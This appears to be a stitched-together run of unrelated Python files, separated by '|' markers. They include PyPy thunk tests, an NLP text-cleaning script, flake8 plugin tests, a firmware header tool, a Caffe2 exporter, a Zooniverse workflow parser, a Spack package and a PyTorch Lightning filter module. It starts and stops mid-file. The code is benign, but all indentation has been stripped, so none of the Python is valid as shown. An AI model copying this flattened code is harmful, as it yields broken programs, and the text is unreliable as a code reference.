f = lazy(f)
y = f(3)
assert lst == []
assert type(y) is int
assert lst == [3]
assert type(y) is int
assert lst == [3]
def test_exception_in_thunk(self):
from __pypy__ import lazy
def f(x):
if x:
return 42
raise ValueError
f = lazy(f)
y = f(3)
assert y == 42
y = f(0)
raises(ValueError, "str(y)")
raises(ValueError, "str(y)")
def test_become_yourself(self):
from __pypy__ import become
x = []
become(x, x)
assert str(x) == "[]"
def test_thunk_special_method(self):
skip("fix me")
from __pypy__ import thunk
x = thunk(lambda : 42)
assert 1 .__add__(x) == 43
class AppTest_ThunkCallMethod(AppTest_Thunk):
def setup_class(cls):
cls.space = gettestobjspace('thunk', CALL_METHOD=True, multimethods='doubledispatch')
def test_method_call(self):
from __pypy__ import thunk
d = {}
# need the method to use the pypy compiler
exec """if 1:
def f(x):
return [x]
def g(l):
l.append(1)
""" in d
l = thunk(d['f'], 10)
d['g'](l)
assert l == [10, 1]
class AppTest_ThunkCallMethodMRD(AppTest_ThunkCallMethod):
def setup_class(cls):
cls.space = gettestobjspace('thunk', CALL_METHOD=True, multimethods='mrd')
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# NLP
# Import the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import dataset
dataset = pd.read_csv('Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3)
# Clean up review text
import re
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
for i in range(0, len(dataset)):
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])
review = review.lower()
review = review.split()
ps = PorterStemmer()
review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
review = ' '.join(review)
corpus.append(review)
# Creating the bag of words model |
# external
import pytest
# project
from flake8_codes._codes import extract
from flake8_codes._codes._default import extract_default
from flake8_codes._codes._registry import registry
# app
from ._constants import KNOWN_PLUGINS
@pytest.mark.parametrize('plugin_name', KNOWN_PLUGINS)
def test_smoke_extract(plugin_name):
codes = extract(plugin_name)
assert codes
for code, msg in codes.items():
assert type(code) is str, 'bad code type'
assert type(msg) is str, 'bad message type'
# that's not exactly true but all plugins follow this convention
assert code[0].isalpha(), 'code must start from letter'
assert code[0].isupper(), 'code must be uppercase'
@pytest.mark.parametrize('plugin_name', KNOWN_PLUGINS)
def test_no_custom_extractor_needed(plugin_name):
extractor = registry.get(plugin_name)
if extractor is None:
return
custom_codes = extractor()
default_codes = extract_default(plugin_name)
assert default_codes != custom_codes
|
#!/usr/bin/env python
import struct
SIGNATURE_AREA_SIZE = 512 - 8
def main():
fw = open("fw.bin", "rb").read()
if fw[:4] == b'SHWF':
print("Firmware already prepared")
exit(1)
header = b'SHWF'
header += struct.pack('<I', len(fw))
header += b'\x00' * SIGNATURE_AREA_SIZE
open("fw.bin", "wb").write(header + fw)
if __name__ == '__main__':
main() |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import numpy as np
from mobile_cv.torch.utils_caffe2.ws_utils import ScopedWS
logger = logging.getLogger(__name__)
# NOTE: specific export_to_db for (data, im_info) dual inputs.
# modified from mobile-vision/common/utils/model_utils.py
def export_to_db(net, params, inputs, outputs, out_file, net_type=None, shapes=None):
# NOTE: special handling for im_info: by default the "predict_init_net"
# will zero_fill inputs/outputs (https://fburl.com/diffusion/nvksomrt),
# however the actual value of "im_info" also matters, so we need use
# extra_init_net to handle this.
import numpy as np
from caffe2.python import core
assert len(inputs) == 2
data_name, im_info_name = inputs
data_shape = shapes[data_name] # assume NCHW
extra_init_net = core.Net("extra_init_net")
im_info = np.array(
[[data_shape[2], data_shape[3], 1.0] for _ in range(data_shape[0])],
dtype=np.float32,
)
extra_init_net.GivenTensorFill(
[], im_info_name, shape=shapes[im_info_name], values=im_info
)
from caffe2.caffe2.fb.predictor import predictor_exporter # NOTE: slow import
predictor_export_meta = predictor_exporter.PredictorExportMeta(
predict_net=net,
parameters=params,
inputs=inputs,
outputs=outputs,
net_type=net_type,
shapes=shapes,
extra_init_net=extra_init_net,
)
logger.info("Writing logdb {} ...".format(out_file))
predictor_exporter.save_to_db(
db_type="log_file_db",
db_destination=out_file,
predictor_export_meta=predictor_export_meta,
)
def export_to_logfiledb(predict_net, init_net, outfile, ws_blobs):
logger.info("Exporting Caffe2 model to {}".format(outfile))
shapes = {
b: data.shape if isinstance(data, np.ndarray)
# proivde a dummpy shape if it could not be inferred
else [1]
for b, data in ws_blobs.items()
}
with ScopedWS("__ws_tmp__", is_reset=True) as ws:
ws.RunNetOnce(init_net)
initialized_blobs = set(ws.Blobs())
uninitialized = [
inp for inp in predict_net.external_input if inp not in initialized_blobs
]
params = list(initialized_blobs)
output_names = list(predict_net.external_output)
export_to_db(
predict_net, params, uninitialized, output_names, outfile, shapes=shapes
)
|
import sys, os, ujson
import pandas as pd
'''
extracts a specific workflow with id workflow_id and version number workflow_version
from a dataframe workflow_df that's read from a workflows file, with accompanying
workflow_cont_df that's read from a workflow contents file.
The needed workflow files are exportable from the Data Exports page in the Project Builder.
The purpose of extracting a workflow is to figure out what structure the annotations
json will have in the classifications exports.
The workflow ID and current workflow version should appear in the project builder
on the page for that workflow. The workflow_version should be the full version, which
is stored as a decimal, even though it's really two integers concatenated with a .
(the major and minor versions of a workflow increment independently of one another).
Returns a dict containing information about the workflow structure, which is used
to create aggregated classifications for the project.
Example: if I want to extract workflow information from the Flying HI project for
the beta workflow (id 3590), version 12.33, I would first read in the workflow info
in a Python/iPython window or in another script with:
workflow_df = pd.read_csv('flying-hi-workflows.csv')
workflow_cdf = pd.read_csv('flying-hi-workflow_contents.csv')
then, to run this and get the output, I'd call:
workflow_info = get_workflow_info(workflow_df, workflow_cdf, 3590, 12.33)
There is only 1 task in that workflow, with 3 drawing tools and a text sub-task
so workflow_info looks like:
In [170]: workflow_info
Out[170]:
{'n_tasks': 1,
'tasknames': ['T0'],
'T0_fulltext': u'Mark any features you see. \n\nUse the "Need some help" button below to see more information.\n\nIf the image is featureless, just click "Done".',
'T0_shorttext': u'mark_any_feature___just_click_done',
'T0_type': 'drawing',
'T0_ntools': 3,
'T0_tool0_type': 'point',
'T0_tool0_ndetails': 0,
'T0_tool1_type': 'line',
'T0_tool1_ndetails': 0,
'T0_tool2_type': 'ellipse',
'T0_tool2_ndetails': 1,
'T0_tool2_detail0_type': 'text'}
where I've sorted this so it's easier to read (the returned dict isn't sorted).
Note, the shorttext is a compression of the full question text, with punctuation
stripped and spaces replaced with underscores. It's a guess at what you might like
the headers of your aggregated data export columns to contain, but it's often a
terrible guess (task description text often starts or ends with a general direction
to click the help button or classify the central object in the image, for example,
and this sometimes ends up grabbing that), so feel free to replace it with
something that better describes the task.
'''
def get_workflow_info(workflow_df, workflow_cont_df, workflow_id, workflow_version):
# initialize the output
workflow_info = {}
# max length of a question label below
global maxlength
maxlength = 35
# get the major and minor workflow versions
wfstr = (str(workflow_version)).split('.')
wf_major = int(wfstr[0])
try:
wf_minor = int(wfstr[1])
except:
# you'll be here if only the major workflow version was supplied.
# In that case just use the most recent minor version for this major version
wf_minor_all = np.max(workflow_cont_df['version'][workflow_cont_df['workflow_id'] == workflow_id].unique())
# parse the tasks column as a json so we can work with it (it just loads as a string)
workflow_df['tasks_json'] = [ujson.loads(q) for q in workflow_df['tasks']]
workflow_cont_df['strings_json'] = [ujson.loads(q) for q in workflow_cont_df['strings']]
# identify the row of the workflow dataframe we want to extract
is_theworkflow = (workflow_df['workflow_id'] == workflow_id) & (workflow_df['version'] == wf_major)
is_ctheworkflow = (workflow_cont_df['workflow_id'] == workflow_id) & (workflow_cont_df['version'] == wf_minor)
# extract it
theworkflow = workflow_df[is_theworkflow]
ctheworkflow = workflow_cont_df[is_ctheworkflow]
# pandas is a little weird about accessing stuff sometimes
# we should only have 1 row in theworkflow but the row index will be retained
# from the full workflow_df, so we need to figure out what it is
i_wf = theworkflow.index[0]
i_cwf = ctheworkflow.index[0]
# extract the tasks as a json
tasks = theworkflow['tasks_json'][i_wf]
strings = ctheworkflow['strings_json'][i_cwf]
workflow_info = tasks.copy()
tasknames = workflow_info.keys()
workflow_info['tasknames'] = tasknames
# now that we've extracted the actual task names, add the first task
workflow_info['first_task'] = theworkflow['first_task'].values[0]
# now join workflow structure to workflow label content for each task
for task in tasknames:
taskslug = get_short_slug(task.lower())
# we don't need the help text and it just clutters things/takes up memory
try:
workflow_info[task]['help'] = ''
except:
pass
################
# question task
################
if (workflow_info[task]['type'] == 'single') | (workflow_info[task]['type'] == 'multiple'):
# first, the question text for the task
q_label = strings[workflow_info[task]['question']]
q_slug = get_short_slug(q_label.lower())
workflow_info[task]['question'] = q_label
# now make a slug for it
workflow_info[task]['question_slug'] = "%s_%s" % (taskslug, q_slug)
# now, do the same for each of the answers
for i, ans in enumerate(workflow_info[task]['answers']):
a_label = strings[workflow_info[task]['answers'][i]['label']]
workflow_info[task]['answers'][i]['label'] = a_label
workflow_info[task]['answers'][i]['label_slug'] = "%s_%s_a%d_%s" % (taskslug, q_slug, i, get_short_slug(a_label.lower()))
################
# drawing task
################
if (workflow_info[task]['type'] == 'drawing'):
# first, the instruction text for the task
# analogous to ['question'] for question tasks above
q_label = strings[workflow_info[task]['instruction']]
q_slug = get_short_slug(q_label.lower())
workflow_info[task]['instruction'] = q_label
# now make a slug for it
workflow_info[task]['instruction_slug'] = "%s_%s" % (taskslug, q_slug)
# now, do the same for each of the drawing tools
for i, ans in enumerate(workflow_info[task]['tools']):
a_label = strings[workflow_info[task]['tools'][i]['label']]
workflow_info[task]['tools'][i]['label'] = a_label
workflow_info[task]['tools'][i]['label_slug'] = "%s_%s_a%d_%s" % (taskslug, q_slug, i, get_short_slug(a_label.lower()))
################
# survey task
################
if (workflow_info[task]['type'] == 'survey'):
# yay
# deal with the survey choices (e.g. species)
workflow_info[task]['choices_slug'] = [taskslug + '_' + get_short_slug(x.lower()) for x in workflow_info[task]['choicesOrder']]
for i_c, choice in enumerate(workflow_info[task]['choices'].keys()):
c_label = strings[workflow_info[task]['choices'][choice]['label']]
workflow_info[task]['choices'][choice]['label'] = c_label
workflow_info[task]['choices'][choice]['label_slug'] = "%s_%s" % (taskslug, get_short_slug(choice).lower())
# deal with the questions attached to every survey choice
# e.g. "is [this species] moving, standing, or sleeping?"
# because these will always be attached to a species, keep the
# slugs short and don't repeat the taskname in them
for i_q, q in enumerate(workflow_info[task]['questions'].keys()):
q_key = get_short_slug(q.lower())
q_label = strings[workflow_info[task]['questions'][q]['label']]
workflow_info[task]['questions'][q]['label'] = q_label
# now make a slug for it
q_slug = get_short_slug(q_label.lower())
workflow_info[task]['questions'][q]['label_slug'] = q_slug
# each question has a set of possible answers (loop through them in order)
for i_a, a in enumerate(workflow_info[task]['questions'][q]['answersOrder']):
a_label = strings[workflow_info[task]['questions'][q]['answers'][a]['label']]
workflow_info[task]['questions'][q]['answers'][a]['label'] = a_label
workflow_info[task]['questions'][q]['answers'][a]['label_slug'] = "%s_a%d_%s" % (q_key, i_a, get_short_slug(a_label.lower()))
################
# shortcut (tickbox) task
################
if (workflow_info[task]['type'] == 'shortcut'):
# the annotations return the label but not the index or key of the answer
# so make a map
workflow_info[task]['answer_map'] = {}
for i_a, ans in enumerate(workflow_info[task]['answers']):
a_label = strings[workflow_info[task]['answers'][i_a]['label']]
workflow_info[task]['answers'][i_a]['label'] = a_label
workflow_info[task]['answer_map'][a_label] = i_a
workflow_info[task]['answers'][i_a]['label_slug'] = "%s_a%d_%s" % (taskslug, i_a, get_short_slug(a_label.lower()))
return workflow_info
# a handful of old scripts will use this format, but most will use the new format
def get_workflow_info_old(workflow_df, workflow_cont_df, workflow_id, workflow_version):
# initialize the output
workflow_info = {}
# max length of a question label below
maxlength = 35
# get the major and minor workflow versions
wfstr = (str(workflow_version)).split('.')
wf_major = int(wfstr[0])
try:
wf_minor = int(wfstr[1])
except:
# you'll be here if only the major workflow version was supplied.
# In that case just use the most recent minor version for this major version
wf_minor_all = np.max(workflow_cont_df['version'][workflow_cont_df['workflow_id'] == workflow_id].unique())
# parse the tasks column as a json so we can work with it (it just loads as a string)
workflow_df['tasks_json'] = [ujson.loads(q) for q in workflow_df['tasks']]
workflow_cont_df['strings_json'] = [ujson.loads(q) for q in workflow_cont_df['strings']]
# identify the row of the workflow dataframe we want to extract
is_theworkflow = (workflow_df['workflow_id'] == workflow_id) & (workflow_df['version'] == wf_major)
is_ctheworkflow = (workflow_cont_df['workflow_id'] == workflow_id) & (workflow_cont_df['version'] == wf_minor)
# extract it
theworkflow = workflow_df[is_theworkflow]
ctheworkflow = workflow_cont_df[is_ctheworkflow]
# pandas is a little weird about accessing stuff sometimes
# we should only have 1 row in theworkflow but the row index will be retained
# from the full workflow_df, so we need to figure out what it is
i_wf = theworkflow.index[0]
i_cwf = ctheworkflow.index[0]
# extract the tasks as a json
tasks = theworkflow['tasks_json'][i_wf]
strings = ctheworkflow['strings_json'][i_cwf]
# not actually sure we need this but let's do it anyway
first_task = theworkflow['first_task'][i_wf]
# save the task count to the output
workflow_info['n_tasks'] = len(tasks)
# iterate through tasks and get the info on what's being measured in the classification
tasknames = []
#workflow_info['tasknames'] = tasknames
for i, task in enumerate(tasks.keys()):
# update the list of task names
tasknames.append(task)
task_type = tasks[task]['type']
workflow_info[task+'_type'] = task_type
# there are several types of tasks, and what populates the json depends
# on the task.
# 'single' = a question task with a single answer choice
# 'multiple' = a question task with multiple possible answers
# 'drawing' = a drawing tasks with potentially multiple drawing tools
# and there are survey and text tasks but I am not doing those yet
# Question task
if (task_type == 'single') | (task_type == 'multiple'):
#print("Question task")
# for these purposes we're not going to retain the flow of tasks. We care
# about how many possible answers there are, so we know how to extract
# them from each classification later.
n_answers = len(tasks[task]['answers'])
workflow_info[task+'_nanswers'] = n_answers
# extract the question text
workflow_info[task+'_fulltext'] = strings[task+'.question']
# the doubling of .replace('__', '_') is in case there are any "\n\n\n" strings
qr = get_short_slug(workflow_info[task+'_fulltext'])
workflow_info[task+'_shorttext'] = qr
# Drawing task
elif task_type == 'drawing':
# get the tools that are in this task
these_tools = tasks[task]['tools']
# report back the count of tools there are in the task
n_tools = len(these_tools)
workflow_info[task+'_ntools'] = n_tools
# extract the question text
workflow_info[task+'_fulltext'] = strings[task+'.instruction']
qr = get_short_slug(workflow_info[task+'_fulltext'].lower())
workflow_info[task+'_shorttext'] = qr
# now extract the information from each tool in the task
for j in range(n_tools):
toolstr = '%s_tool%d' % (task, j)
tool = these_tools[j]
# every tool has a type, and what we do later depends on it, so report it
# e.g. elliptical, point, polygon, etc etc.
workflow_info[toolstr+'_type'] = tool['type']
n_deets = len(tool['details'])
workflow_info[toolstr+'_ndetails'] = n_deets
# if there are further details, record those too
# "details" = sub-tasks
# pretty sure the details can be either free text or questions
if n_deets > 0:
# writing this is making me hate subtasks
# there can be an arbitrary number of subtask questions
# and also the subtask questions can be single, multiple or text
for k in range(n_deets):
deets_str = '%s_detail%d' % (toolstr, k)
deets_type = tool['details'][k]['type']
workflow_info[deets_str+'_type'] = deets_type
# if it's a text sub-task there's just 1 text box and we're good
# if it's a question sub-task we need to add an answer count
if (deets_type == 'single') | (deets_type == 'multiple'):
workflow_info[deets_str+'_nanswers'] = len(tool['details'][k]['answers'])
elif task_type == 'survey':
# the workflow file contains a lot of info about the survey but I think we don't necessarily need to specify it all
workflow_info[task+'_nquestions'] = len(tasks[task]['questions'].keys())
workflow_info[task+'_questions'] = tasks[task]['questions'].keys()
workflow_info[task+'_nchoices'] = len(tasks[task]['choices'].keys())
workflow_info[task+'_choices'] = tasks[task]['choicesOrder']
# we need the name of the task that says e.g. "nothing here"
workflow_info[task+'_unlinkedTask'] = tasks[task]['unlinkedTask']
# get info about which questions have multiple answers
workflow_info[task+'_q_multiple'] = {}
for q in tasks[task]['questions'].keys():
workflow_info[task+'_q_multiple'][q] = tasks[task]['questions'][q]['multiple']
elif task_type == 'shortcut':
# don't really do anything, because this should (?) be a single checkbox
# e.g. "Nothing here"
workflow_info[task+'_nanswers'] = len(tasks[task]['answers'])
acol = []
acol_slug = []
for ans in tasks[task]['answers']:
acol.append(strings[ans['label']])
qr = get_short_slug(strings[ans['label']].lower())
acol_slug.append(qr)
workflow_info[task+'_answers'] = acol
workflow_info[task+'_answers_slug'] = acol_slug
# now that we've looped through all tasks, save the list of task names too
workflow_info['tasknames'] = tasknames
return workflow_info
# get the names of columns to appear in the eventual aggregated classification output
#
def get_class_cols(workflow_info):
class_cols = []
# always store the total classification count
class_cols.append('class_count')
for task in workflow_info['tasknames']:
thetask = workflow_info[task]
####################
# question task
####################
if (thetask['type'] == 'single') | (thetask['type'] == 'multiple'):
# we aggregate questions into fractions so for each question task
# we need a classifier count who answered the question,
# classifier counts for each response, and fractions for each response
# this is the same whether or not the question can accept multiple
# answers in a single classification
q_slug = thetask['question_slug']
# add the vote count for this task
class_cols.append("%s_count" % q_slug)
for i, ans in enumerate(thetask['answers']):
a_slug = thetask['answers'][i]['label_slug']
class_cols.append("%s_count" % a_slug)
class_cols.append("%s_frac" % a_slug)
####################
# drawing task
####################
# to do
####################
# survey task
####################
if (thetask['type'] == 'survey'):
# note: below, "choices" <--> "species"
# and "questions" <--> "behavior"
# because I'm thinking about these in terms of ecology projects
# but in fact they're coded in Panoptes more generally than that.
# surveys are basically an annotations matrix, with species on one
# axis and behaviors on the other.
# (plus the "shortcut" of e.g. "nothing here" or "fire", etc., but
# (those are dealt with separately below)
# If we're looking to flatten this to make it easier for research
# teams to deal with, we need 1 column for each entry in that matrix.
#
# That means a lot of columns, even before trying to keep track
# of counts *and* fractions.
#
# Python can handle this, but it might get unwieldy for research
# teams, especially if many of those columns are likely to be blank.
# For now, we just need to define them all, and then try to
# compress later by e.g. ignoring empty columns.
# for each species choice, define count/frac and behavior columns
for choice in thetask['choices_slug']:
# the choices_slug entry should already have the task name in it
class_cols.append("%s_count" % choice)
#class_cols.append("%s_frac" % choice)
for q in thetask['questionsOrder']:
q_slug = thetask['questions'][q]['label_slug']
class_cols.append("%s_%s_count" % (choice, q_slug))
#class_cols.append("%s_%s_frac" % (choice, q_slug))
for a in thetask['questions'][q]['answersOrder']:
# the answer slug already has a short form of the question in it
a_slug = thetask['questions'][q]['answers'][a]['label_slug']
class_cols.append("%s_%s_count" % (choice, a_slug))
#class_cols.append("%s_%s_frac" % (choice, a_slug))
####################
# shortcut task
####################
if (thetask['type'] == 'shortcut'):
# This is very similar to the question task above, but there isn't
# any question text, so just do the answers
for i, ans in enumerate(thetask['answers']):
a_slug = thetask['answers'][i]['label_slug']
class_cols.append("%s_count" % a_slug)
class_cols.append("%s_frac" % a_slug)
return class_cols
def translate_non_alphanumerics(to_translate, translate_to=u'_'):
not_letters_or_digits = u'!"#%\'()*+,-./:;<=>?@[\]^_`{|}~'
translate_table = dict((ord(char), translate_to) for char in not_letters_or_digits)
return to_translate.translate(translate_table)
def get_short_slug(thestr):
qq = (translate_non_alphanumerics(thestr, translate_to=u'')).replace('\n', '_').replace(' ', '_').replace('__', '_').replace('__', '_')
if len(qq) > maxlength:
ii = (maxlength-2)/2
qr = qq[:ii]+'__'+qq[-ii:]
else:
qr = qq
if qr.startswith('_'):
qr = qr[1:]
if qr.endswith('_'):
qr = qr[:-1]
return qr
#
|
# Write a procedure, input a list with sublist elements, and output a list with no sublists.
# 写一个函数,输入一个含有列表的列表,输出一个不含有列表的列表。
# input /输入:[1, [2, 0], [3, 0, [4, 7, 5]]]
# output /输出: x = [1, 2, 0, 3, 0, 4, 7, 5]
def get_final_list(a_list):
final_list = []
to_check = a_list
#print to_check
while to_check:
if isinstance(to_check[0], list) or isinstance(to_check[0], tuple):
new_list = to_check[0]
del to_check[0]
#print to_check
to_check = new_list + to_check # NOT to_check += new_list
#print to_check
else:
final_list.append(to_check[0])
del to_check[0]
#print final_list
return final_list
def is_sublist(i):
if isinstance(i, list) or isinstance(i, tuple):
return True
else:
return False
# x = [1, [2, 0], [3, 0, [4, 7, 5]]]
# print get_final_list(x)
# >>>[1, 2, 0, 3, 0, 4, 7, 5]
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Mc(AutotoolsPackage):
"""The GNU Midnight Commander is a visual file manager."""
homepage = "https://midnight-commander.org"
url = "http://ftp.midnight-commander.org/mc-4.8.20.tar.bz2"
version('4.8.23', sha256='238c4552545dcf3065359bd50753abbb150c1b22ec5a36eaa02c82808293267d')
version('4.8.21', sha256='251d9f0ef9309ef3eea0fdc4c12b8b61149e5056bef1b2de2ccc7f015d973444')
version('4.8.20', sha256='2d85daaa6ab26e524946df4823ac2f69802bc16bc967781b5e28d5b86fc3b979')
depends_on('ncurses')
depends_on('pkgconfig', type='build')
depends_on('glib@2.14:')
depends_on('libssh2@1.2.5:')
def setup_build_environment(self, env):
# Fix compilation bug on macOS by pretending we don't have utimensat()
# https://github.com/MidnightCommander/mc/pull/130
if 'darwin' in self.spec.architecture:
env.set('ac_cv_func_utimensat', 'no')
def configure_args(self):
args = [
'--disable-debug',
'--disable-dependency-tracking',
'--disable-silent-rules',
'--without-x',
'--with-screen=ncurses',
'--enable-vfs-sftp'
]
return args
|
# System imports
import sys
import os
# 3rd party imports
import numpy as np
import torch
from torch.nn import Linear
import torch.nn.functional as F
from torch.utils.data import random_split
from torch.utils.data import Dataset
from torch_geometric.data import DataLoader
from torch_cluster import radius_graph
import pytorch_lightning as pl
from pytorch_lightning import LightningModule
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Local imports
from exatrkx.src.utils_torch import graph_intersection
from exatrkx.src import utils_dir
def load_dataset(input_dir, num):
if not os.path.exists(input_dir):
return None
all_events = os.listdir(input_dir)
all_events = sorted([os.path.join(input_dir, event) for event in all_events])
loaded_events = [torch.load(event, map_location=torch.device('cpu')) for event in all_events[:num]]
return loaded_events
class FilterBase(LightningModule):
def __init__(self, hparams):
super().__init__()
'''
Initialise the Lightning Module that can scan over different filter training regimes
'''
# Assign hyperparameters
self.hparams = hparams
self.hparams['input_dir'] = utils_dir.embedding_outdir
self.hparams['output_dir'] = utils_dir.filtering_outdir
def setup(self, stage):
datatypes = ["train", "val", "test"]
input_dirs = [os.path.join(self.hparams["input_dir"], datatype) for datatype in datatypes]
self.trainset, self.valset, self.testset = [load_dataset(input_dir, self.hparams["train_split"][i])
for i, input_dir in enumerate(input_dirs)]
def train_dataloader(self):
if len(self.trainset) > 0:
return DataLoader(self.trainset, batch_size=1, num_workers=1)
else:
return None
def val_dataloader(self):
if len(self.valset) > 0:
return DataLoader(self.valset, batch_size=1, num_workers=1)
else:
return None
def test_dataloader(self):
if len(self.testset):
return DataLoader(self.testset, batch_size=1, num_workers=1)
else:
return None
def configure_optimizers(self):
optimizer = [torch.optim.AdamW(self.parameters(), lr=(self.hparams["lr"]), betas=(0.9, 0.999), eps=1e-08, amsgrad=True)]
scheduler = [
{
'scheduler': torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer[0], factor=self.hparams["factor"], patience=self.hparams["patience"]),
'monitor': 'val_loss',
'interval': 'epoch',
'frequency': 1
}
]
# scheduler = [torch.optim.lr_scheduler.StepLR(optimizer[0], step_size=1, gamma=0.3)]
return optimizer, scheduler
def training_step(self, batch, batch_idx):
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
if self.hparams['ratio'] != 0:
num_true, num_false = batch.y.bool().sum(), (~batch.y.bool()).sum()
fake_indices = torch.where(~batch.y.bool())[0][torch.randint(num_false, (num_true.item()*self.hparams['ratio'],))]
true_indices = torch.where(batch.y.bool())[0]
combined_indices = torch.cat([true_indices, fake_indices])
# Shuffle indices:
combined_indices[torch.randperm(len(combined_indices))]
weight = (torch.tensor(self.hparams["weight"]) if ("weight" in self.hparams)
else torch.tensor(self.hparams['ratio']))
else:
combined_indices = torch.range(batch.e_radius.shape[1])
weight = (torch.tensor(self.hparams["weight"]) if ("weight" in self.hparams)
else torch.tensor((~batch.y.bool()).sum() / batch.y.sum()))
output = (self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:,combined_indices], emb).squeeze()
if ('ci' in self.hparams["regime"])
else self(batch.x, batch.e_radius[:,combined_indices], emb).squeeze())
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0,combined_indices]] == batch.pid[batch.e_radius[1,combined_indices]]
loss = F.binary_cross_entropy_with_logits(output, y_pid.float(), pos_weight = weight)
else:
loss = F.binary_cross_entropy_with_logits(output, batch.y[combined_indices], pos_weight = weight)
self.log('train_loss', loss, prog_bar=True)
return loss
def validation_step(self, batch, batch_idx):
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
subset_ind = torch.randint(batch.e_radius.shape[1], (int(batch.e_radius.shape[1]*self.hparams['val_subset']),))
output = self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:, subset_ind], emb).squeeze() if ('ci' in self.hparams["regime"]) else self(batch.x, batch.e_radius[:, subset_ind], emb).squeeze()
val_loss = F.binary_cross_entropy_with_logits(output, batch.y[subset_ind])
self.log('val_loss', val_loss, prog_bar=True)
#Edge filter performance
preds = F.sigmoid(output) > self.hparams["filter_cut"] #Maybe send to CPU??
edge_positive = preds.sum().float()
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0,subset_ind]] == batch.pid[batch.e_radius[1,subset_ind]]
edge_true = y_pid.sum()
edge_true_positive = (y_pid & preds).sum().float()
else:
edge_true = batch.y[subset_ind].sum()
edge_true_positive = (batch.y[subset_ind].bool() & preds).sum().float()
self.log_dict({
'val_eff': edge_true_positive/edge_true,
'val_pur': edge_true_positive/edge_positive}, prog_bar=True)
def optimizer_step(self, current_epoch, batch_nb, optimizer, optimizer_idx, second_order_closure=None, on_tpu=False, using_native_amp=False, using_lbfgs=False):
# warm up lr
if (self.hparams["warmup"] is not None) and (self.trainer.global_step < self.hparams["warmup"]):
lr_scale = min(1., float(self.trainer.global_step + 1) / self.hparams["warmup"])
for pg in optimizer.param_groups:
pg['lr'] = lr_scale * self.hparams["lr"]
# update params
optimizer.step()
optimizer.zero_grad()
class FilterBaseBalanced(FilterBase):
def __init__(self, hparams):
super().__init__(hparams)
'''
Initialise the Lightning Module that can scan over different filter training regimes
'''
def training_step(self, batch, batch_idx):
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
with torch.no_grad():
sections = 8
cut_list = []
for j in range(sections):
subset_ind = torch.chunk(torch.arange(batch.e_radius.shape[1]), sections)[j]
output = self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:, subset_ind], emb).squeeze() if ('ci' in self.hparams["regime"]) else self(batch.x, batch.e_radius[:, subset_ind], emb).squeeze()
cut = F.sigmoid(output) > self.hparams["filter_cut"]
cut_list.append(cut)
cut_list = torch.cat(cut_list)
num_true, num_false = batch.y.bool().sum(), (~batch.y.bool()).sum()
true_indices = torch.where(batch.y.bool())[0]
hard_negatives = cut_list & ~batch.y.bool()
hard_indices = torch.where(hard_negatives)[0]
hard_indices = hard_indices[torch.randperm(len(hard_indices))][:int(len(true_indices)*self.hparams["ratio"]/2)]
easy_indices = torch.where(~batch.y.bool())[0][torch.randint(num_false, (int(num_true.item()*self.hparams['ratio']/2),))]
combined_indices = torch.cat([true_indices, hard_indices, easy_indices])
# Shuffle indices:
combined_indices[torch.randperm(len(combined_indices))]
weight = torch.tensor(self.hparams["weight"])
output = (self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:,combined_indices], emb).squeeze()
if ('ci' in self.hparams["regime"])
else self(batch.x, batch.e_radius[:,combined_indices], emb).squeeze())
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0,combined_indices]] == batch.pid[batch.e_radius[1,combined_indices]]
loss = F.binary_cross_entropy_with_logits(output, y_pid.float(), pos_weight = weight)
else:
loss = F.binary_cross_entropy_with_logits(output, batch.y[combined_indices], pos_weight = weight)
# result = pl.TrainResult(minimize=loss)
# result.log('train_loss', loss, prog_bar=True)
self.log('train_loss', loss, prog_bar=True)
return loss
def validation_step(self, batch, batch_idx):
self.shared_evaluation(batch, batch_idx)
def test_step(self, batch, batch_idx):
self.shared_evaluation(batch, batch_idx)
def shared_evaluation(self, batch, batch_idx):
'''
This method is shared between validation steps and test steps
'''
emb = (None if (self.hparams["emb_channels"] == 0)
else batch.embedding) # Does this work??
sections = 8
score_list = []
val_loss = torch.tensor(0).float()
for j in range(sections):
subset_ind = torch.chunk(torch.arange(batch.e_radius.shape[1]), sections)[j]
output = self(torch.cat([batch.cell_data, batch.x], axis=-1), batch.e_radius[:, subset_ind], emb).squeeze() if ('ci' in self.hparams["regime"]) else self(batch.x, batch.e_radius[:, subset_ind], emb).squeeze()
scores = F.sigmoid(output)
score_list.append(scores)
if ('pid' not in self.hparams['regime']):
val_loss = val_loss + F.binary_cross_entropy_with_logits(output, batch.y[subset_ind])
else:
y_pid = batch.pid[batch.e_radius[0, subset_ind]] == batch.pid[batch.e_radius[1, subset_ind]]
val_loss = val_loss + F.binary_cross_entropy_with_logits(output, y_pid)
score_list = torch.cat(score_list)
cut_list = score_list > self.hparams["filter_cut"]
# result = pl.EvalResult(checkpoint_on=val_loss)
self.log("val_loss", val_loss, prog_bar=True)
# result = pl.TrainResult(minimize=val_loss)
# result.log('val_loss', val_loss)
#Edge filter performance
edge_positive = cut_list.sum().float()
if ('pid' in self.hparams["regime"]):
y_pid = batch.pid[batch.e_radius[0]] == batch.pid[batch.e_radius[1]]
edge_true = y_pid.sum()
edge_true_positive = (y_pid & cut_list).sum().float()
else:
edge_true = batch.y.sum()
